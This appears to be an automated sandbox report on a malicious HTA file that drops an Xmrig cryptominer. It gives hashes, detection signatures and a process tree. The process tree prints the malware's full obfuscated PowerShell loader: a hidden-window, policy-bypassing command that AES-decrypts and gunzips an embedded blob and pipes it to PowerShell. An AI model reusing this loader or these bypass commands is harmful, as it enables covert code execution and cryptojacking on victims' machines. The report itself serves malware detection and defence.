Edit tour
Windows
Analysis Report
tegga.hta
Overview
General Information
| Sample name: | tegga.hta |
| Analysis ID: | 1569411 |
| MD5: | 05751660dcf5a2847b6185482a0b1cbe |
| SHA1: | efea31a616d1383b6a68b060a109db34986163c4 |
| SHA256: | 70278ca40fa83bb0ece05e455ac3907aba311f004ba10f8d723cde1dda8caf89 |
| Tags: | htauser-abuse_ch |
| Infos: |   |
 | |
Detection
Xmrig
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Powershell decode and execute
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell creates an autostart link
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious command line found
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Startup Folder File Write
Sigma detected: Use Short Name Path in Command Line
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
mshta.exe (PID: 4664 cmdline: mshta.exe "C:\Users\ user\Deskt op\tegga.h ta" MD5: 06B02D5C097C7DB1F109749C45F3F505) 
powershell.exe (PID: 5748 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy UnR estricted Start-Proc ess 'cmd.e xe' -Windo wStyle hid den -Argum entList {/ c powershe ll.exe $gl egle = 'Fv LGrTA8BFp3 jKef1kr1AM IDvxnQsqG2 K75pfL4ZV6 IacsNtEdiP rVXMoDXJJ1 l7L0uEFRZX jT2SnU+Hpa 12OXdL6HmS MV3lCNEmmR TljkJ7FDCJ 7bbjjKCKO7 B+MFRj3l35 ntTU3i2mvX 2tJo2m3WQN ztocNZdvzc Dsu+VeybsX nUIYkKqovp q+nAFeBElc zXo2aBTR9g xe75nw0zF4 qSSZOXYCfi e4IX8vFhXf HYhEARxZ7N n0WbMm0eDZ W91aqeEVLr 0cEUUdv53w 8tfniJc2fp /3hOuhRm6u kXc5Dx3yIq Al9YQ1YNGp wJ4UlbAnKO AtZ+sFqu2c AMbPVqb7nf Dopeg4Wkna YnUnLeVI8O /E7crxweOx 6O4AhTJ6qU RxSwM9HkjH DuG6TccjkV M2jDbEeVSe 5sMZCdA114 KDr/xd3WQh LUs685bmTH ADpqBoZrib HtQN1tcL6K RmUw5Ro46u tb7IfJMDIG 49jt7UijbR qEZrIe4MC/ RquMKXboco W9dgQEnQ1W YSfBxT217H ritL6JD3Ef +3DaGBaOt2 8L9l6nd1E1 0oVASZM1R6 n1CC';$cls cls = 'GkX yEyDz390SN hTkxqmG5l5 9RAmA3sLhr majpCLVFE0 =';$lmblmb = New-Obj ect 'Syste m.Security .Cryptogra phy.AesMan aged';$lmb lmb.Mode = [System.S ecurity.Cr yptography .CipherMod e]::CBC;$l mblmb.Padd ing = [Sys tem.Securi ty.Cryptog raphy.Padd ingMode]:: Zeros;$lmb lmb.BlockS ize = 128; $lmblmb.Ke ySize = 25 6;$lmblmb. Key = [Sys tem.Conver t]::FromBa se64String ($clscls); $bgbgbg = [System.Co nvert]::Fr omBase64St ring($gleg le);$flflf l = $bgbgb g[0..15];$ lmblmb.IV = $flflfl; $sasabr = $lmblmb.Cr eateDecryp tor();$frf rfr = $sas abr.Transf ormFinalBl ock($bgbgb g, 16, $bg bgbg.Lengt h - 16);$l mblmb.Disp ose();$fis fis = New- Object Sys tem.IO.Mem oryStream( , $frfrfr );$regist = New-Obj ect System .IO.Memory Stream;$io pole = New -Object Sy stem.IO.Co mpression. GzipStream $fisfis, ([IO.Compr ession.Com pressionMo de]::Decom press);$io pole.CopyT o( $regist );$iopole .Close();$ fisfis.Clo se();[byte []] $frenx k = $regis t.ToArray( );$baksmo = [System. Text.Encod ing]::UTF8 .GetString ($frenxk); $baksmo | powershell - } MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
conhost.exe (PID: 6192 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7196 cmdline:
"C:\Window s\system32 \cmd.exe" /c powersh ell.exe $g legle = 'F vLGrTA8BFp 3jKef1kr1A MIDvxnQsqG 2K75pfL4ZV 6IacsNtEdi PrVXMoDXJJ 1l7L0uEFRZ XjT2SnU+Hp a12OXdL6Hm SMV3lCNEmm RTljkJ7FDC J7bbjjKCKO 7B+MFRj3l3 5ntTU3i2mv X2tJo2m3WQ NztocNZdvz cDsu+Veybs XnUIYkKqov pq+nAFeBEl czXo2aBTR9 gxe75nw0zF 4qSSZOXYCf ie4IX8vFhX fHYhEARxZ7 Nn0WbMm0eD ZW91aqeEVL r0cEUUdv53 w8tfniJc2f p/3hOuhRm6 ukXc5Dx3yI qAl9YQ1YNG pwJ4UlbAnK OAtZ+sFqu2 cAMbPVqb7n fDopeg4Wkn aYnUnLeVI8 O/E7crxweO x6O4AhTJ6q URxSwM9Hkj HDuG6Tccjk VM2jDbEeVS e5sMZCdA11 4KDr/xd3WQ hLUs685bmT HADpqBoZri bHtQN1tcL6 KRmUw5Ro46 utb7IfJMDI G49jt7Uijb RqEZrIe4MC /RquMKXboc oW9dgQEnQ1 WYSfBxT217 HritL6JD3E f+3DaGBaOt 28L9l6nd1E 10oVASZM1R 6n1CC';$cl scls = 'Gk XyEyDz390S NhTkxqmG5l 59RAmA3sLh rmajpCLVFE 0=';$lmblm b = New-Ob ject 'Syst em.Securit y.Cryptogr aphy.AesMa naged';$lm blmb.Mode = [System. Security.C ryptograph y.CipherMo de]::CBC;$ lmblmb.Pad ding = [Sy stem.Secur ity.Crypto graphy.Pad dingMode]: :Zeros;$lm blmb.Block Size = 128 ;$lmblmb.K eySize = 2 56;$lmblmb .Key = [Sy stem.Conve rt]::FromB ase64Strin g($clscls) ;$bgbgbg = [System.C onvert]::F romBase64S tring($gle gle);$flfl fl = $bgbg bg[0..15]; $lmblmb.IV = $flflfl ;$sasabr = $lmblmb.C reateDecry ptor();$fr frfr = $sa sabr.Trans formFinalB lock($bgbg bg, 16, $b gbgbg.Leng th - 16);$ lmblmb.Dis pose();$fi sfis = New -Object Sy stem.IO.Me moryStream ( , $frfrf r );$regis t = New-Ob ject Syste m.IO.Memor yStream;$i opole = Ne w-Object S ystem.IO.C ompression .GzipStrea m $fisfis, ([IO.Comp ression.Co mpressionM ode]::Deco mpress);$i opole.Copy To( $regis t );$iopol e.Close(); $fisfis.Cl ose();[byt e[]] $fren xk = $regi st.ToArray ();$baksmo = [System .Text.Enco ding]::UTF 8.GetStrin g($frenxk) ;$baksmo | powershel l - MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7204 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7240 cmdline:
powershell .exe $gleg le = 'FvLG rTA8BFp3jK ef1kr1AMID vxnQsqG2K7 5pfL4ZV6Ia csNtEdiPrV XMoDXJJ1l7 L0uEFRZXjT 2SnU+Hpa12 OXdL6HmSMV 3lCNEmmRTl jkJ7FDCJ7b bjjKCKO7B+ MFRj3l35nt TU3i2mvX2t Jo2m3WQNzt ocNZdvzcDs u+VeybsXnU IYkKqovpq+ nAFeBElczX o2aBTR9gxe 75nw0zF4qS SZOXYCfie4 IX8vFhXfHY hEARxZ7Nn0 WbMm0eDZW9 1aqeEVLr0c EUUdv53w8t fniJc2fp/3 hOuhRm6ukX c5Dx3yIqAl 9YQ1YNGpwJ 4UlbAnKOAt Z+sFqu2cAM bPVqb7nfDo peg4WknaYn UnLeVI8O/E 7crxweOx6O 4AhTJ6qURx SwM9HkjHDu G6TccjkVM2 jDbEeVSe5s MZCdA114KD r/xd3WQhLU s685bmTHAD pqBoZribHt QN1tcL6KRm Uw5Ro46utb 7IfJMDIG49 jt7UijbRqE ZrIe4MC/Rq uMKXbocoW9 dgQEnQ1WYS fBxT217Hri tL6JD3Ef+3 DaGBaOt28L 9l6nd1E10o VASZM1R6n1 CC';$clscl s = 'GkXyE yDz390SNhT kxqmG5l59R AmA3sLhrma jpCLVFE0=' ;$lmblmb = New-Objec t 'System. Security.C ryptograph y.AesManag ed';$lmblm b.Mode = [ System.Sec urity.Cryp tography.C ipherMode] ::CBC;$lmb lmb.Paddin g = [Syste m.Security .Cryptogra phy.Paddin gMode]::Ze ros;$lmblm b.BlockSiz e = 128;$l mblmb.KeyS ize = 256; $lmblmb.Ke y = [Syste m.Convert] ::FromBase 64String($ clscls);$b gbgbg = [S ystem.Conv ert]::From Base64Stri ng($glegle );$flflfl = $bgbgbg[ 0..15];$lm blmb.IV = $flflfl;$s asabr = $l mblmb.Crea teDecrypto r();$frfrf r = $sasab r.Transfor mFinalBloc k($bgbgbg, 16, $bgbg bg.Length - 16);$lmb lmb.Dispos e();$fisfi s = New-Ob ject Syste m.IO.Memor yStream( , $frfrfr ) ;$regist = New-Objec t System.I O.MemorySt ream;$iopo le = New-O bject Syst em.IO.Comp ression.Gz ipStream $ fisfis, ([ IO.Compres sion.Compr essionMode ]::Decompr ess);$iopo le.CopyTo( $regist ) ;$iopole.C lose();$fi sfis.Close ();[byte[] ] $frenxk = $regist. ToArray(); $baksmo = [System.Te xt.Encodin g]::UTF8.G etString($ frenxk);$b aksmo MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - powershell.exe (PID: 7248 cmdline:
powershell - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - powershell.exe (PID: 7484 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -ep unrest ricted -Fi le C:\User s\user~1\A ppData\Loc al\Temp\ru nCi.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
chrome.exe (PID: 7628 cmdline: "C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t https:// www.blockc hain.com/e xplorer/ad dresses/bt c/16eFuis7 C1uU1vUrVK 58FLgwXWP1 xb4mJo MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - chrome.exe (PID: 7840 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2176 --fi eld-trial- handle=190 8,i,120035 2314455220 389,667040 8228213856 927,262144 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
- powershell.exe (PID: 2044 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -ep bypass -WindowSt yle hidden & $env:TE MP\UpdateS SH.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1928 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| xmrig | According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. | No Attribution |
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | ||
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||